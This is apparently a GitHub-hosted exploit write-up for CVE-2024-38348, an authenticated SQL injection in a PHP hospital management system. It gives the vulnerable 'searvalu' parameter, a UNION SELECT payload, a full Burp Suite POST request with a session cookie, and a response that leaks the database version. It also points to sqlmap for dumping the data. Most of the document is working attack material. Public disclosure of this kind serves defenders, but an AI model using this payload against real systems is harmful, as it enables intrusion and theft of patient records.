-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-38348
73 lines (62 loc) · 2.67 KB
/
CVE-2024-38348
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
# Exploit Title: Health Care hospital Management System - SQL Injection (Authenticated)
# Date: 2024-06-05
# Exploit Author: Sandeep Rajauriya
# Vendor Homepage: https://code-projects.org/health-care-hospital-in-php-css-js-and-mysql-free-download/
# Software Link: https://download-media.code-projects.org/2020/04/Health_Care_hospital_IN_PHP_CSS_Js_AND_MYSQL__FREE_DOWNLOAD_AkGgvwi.zip
# Version: 1.0
# Tested on: Windows 11, PHP 8.2.12, Apache 2.4.58
# CVE: CVE-2024-38348
------------------------------------------------------------------------------------
1. Description:
----------------------
Health Care hospital Management System allows SQL Injection via parameter like "searvalu" in "Staff Info" module.Exploiting this issue could allow an attacker to compromise the application, access or modify data,
or exploit latest vulnerabilities in the underlying database.
2. Proof of Concept:
----------------------
In sqlmap use 'searvalu' parameter to dump hostname and version of database. Then run SQLmap to extract the data from the database:
3. Example payload:
----------------------
'+union+select+@@version,null,null,null,null,null,null,null,null,null,null,null,null,null,null--+
4. Burpsuite HTTP Request on 'searvalu' parameter:
----------------------
POST /HMS/sestaffactmem.php HTTP/1.1
Host: --REDACTED--
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
Origin: http://--REDACTED--
Connection: close
Referer: http://--REDACTED--/HMS/sestaffactmem.php
Cookie: PHPSESSID=podmt61i233pamo53i63gt78f7
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=1
searvalu=test'+union+select+@@version,null,null,null,null,null,null,null,null,null,null,null,null,null,null--+&filter=
5. Burpsuite HTTP Response
----------------------
HTTP/1.1 200 OK
Date: Wed, 05 Jun 2024 17:50:17 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 7537
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
--REDACTED--
<h4 style=" color:">
Patient Reg.No : 10.4.32-MariaDB<br />
Patient Name : <br />
</h4>
<dl class="dl-horizontal">
--REDACTED--